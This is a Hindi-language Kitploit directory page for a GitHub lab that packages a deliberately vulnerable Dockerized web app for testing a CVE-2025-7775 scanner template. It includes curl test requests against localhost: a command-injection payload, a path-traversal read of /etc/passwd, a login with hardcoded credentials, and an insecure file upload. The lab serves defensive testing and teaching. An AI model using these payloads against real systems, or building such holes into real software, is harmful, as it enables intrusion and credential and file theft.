Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-7775-vulnerable-lab — कमजोर डॉकराइज़्ड वेब ऐप जो RCE, पाथ ट्रैवर्सल, हार्डकोडेड क्रेडेंशियल्स और असुरक्षित फ़ाइल अपलोड को उजागर करता है; सुरक्षा स्कैनर टेम्पलेट्स के परीक्षण के लिए एक पृथक लैब। | Kitploit
उपकरण/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
भेद्यता स्कैनरवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

कमजोर डॉकराइज़्ड वेब ऐप जो RCE, पाथ ट्रैवर्सल, हार्डकोडेड क्रेडेंशियल्स और असुरक्षित फ़ाइल अपलोड को उजागर करता है; सुरक्षा स्कैनर टेम्पलेट्स के परीक्षण के लिए एक पृथक लैब।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-7775 संवेदनशील लैब

यह रिपॉजिटरी CVE-2025-7775 के लिए nuclei टेम्पलेट का परीक्षण करने हेतु एक संवेदनशील सेटअप प्रदान करती है।

चलाएँ

root@kitploit:~
docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

भेद्यता परीक्षण

1. रिमोट कमांड निष्पादन (RCE)

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. पथ ट्रैवर्सल

root@kitploit:~
curl "http://localhost:5000/download?file=/etc/passwd"

3. हार्डकोडेड क्रेडेंशियल

root@kitploit:~
curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. असुरक्षित फ़ाइल अपलोड

root@kitploit:~
echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

उपयोग नोट्स

  • यह केवल परीक्षण उद्देश्यों के लिए एक अनुकरणित संवेदनशील वातावरण है
  • केवल पृथक प्रयोगशाला वातावरण में उपयोग करें
  • उत्पादन उपयोग के लिए नहीं
  • केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए

सफाई

root@kitploit:~
docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
टूल डाउनलोड करें